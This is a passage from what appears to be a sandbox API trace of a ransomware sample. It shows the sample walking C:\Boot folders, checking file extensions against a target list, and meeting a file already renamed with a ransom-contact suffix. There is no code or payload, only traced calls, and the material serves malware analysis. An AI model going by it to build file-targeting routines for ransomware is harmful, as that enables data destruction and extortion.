lstrcmpiW (lpString1=".psd", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".pst") returned 4 [0284.653] lstrcmpiW (lpString1=".pst", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".ptx") returned 4 [0284.653] lstrcmpiW (lpString1=".ptx", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".pub") returned 4 [0284.653] lstrcmpiW (lpString1=".pub", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".pwm") returned 4 [0284.653] lstrcmpiW (lpString1=".pwm", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".pxr") returned 4 [0284.654] lstrcmpiW (lpString1=".pxr", lpString2="LOG1") returned -1 [0284.654] lstrlenW (lpString=".py") returned 3 [0284.654] lstrcmpiW (lpString1=".py", lpString2="OG1") returned -1 [0284.654] lstrlenW (lpString=".qt") returned 3 [0284.654] lstrcmpiW (lpString1=".qt", lpString2="OG1") returned -1 [0284.654] lstrlenW (lpString=".r3d") returned 4 [0284.654] lstrcmpiW (lpString1=".r3d", lpString2="LOG1") returned -1 [0284.654] lstrlenW (lpString=".raf") returned 4 [0284.654] lstrcmpiW (lpString1=".raf", lpString2="LOG1") returned -1 [0284.654] lstrlenW (lpString=".rar") returned 4 [0284.654] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0284.654] lstrlenW (lpString=".raw") returned 4 [0284.654] lstrcmpiW (lpString1=".raw", lpString2="LOG1") returned -1 [0284.654] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0284.654] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0284.654] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.655] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0284.655] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.655] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.655] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0284.655] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0284.655] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.655] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0284.656] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5c6a0f65, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c6a0f65, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c6a0f65, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x100fc, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BOOTSTAT.DAT.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="BOOTST~1.MSP")) returned 1 [0284.656] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0284.656] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0284.656] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.656] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0284.656] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.657] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.657] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.657] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.657] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0284.657] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.657] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0284.657] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.657] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948328 [0284.658] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.658] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.659] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.659] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.659] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0284.659] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.659] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0284.659] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.659] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39480a8 [0284.660] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.660] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.660] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.660] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.660] FindClose (in: hFindFile=0x39480a8 | out: hFindFile=0x39480a8) returned 1 [0284.660] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.660] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0284.660] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.660] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39482e8 [0284.661] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.661] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.662] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.662] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.662] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0284.662] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.662] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0284.662] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.662] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948028 [0284.663] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.663] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.663] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0284.664] FindClose (in: hFindFile=0x3948028 | out: hFindFile=0x3948028) returned 1 [0284.664] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.664] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0284.664] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.664] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0284.664] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 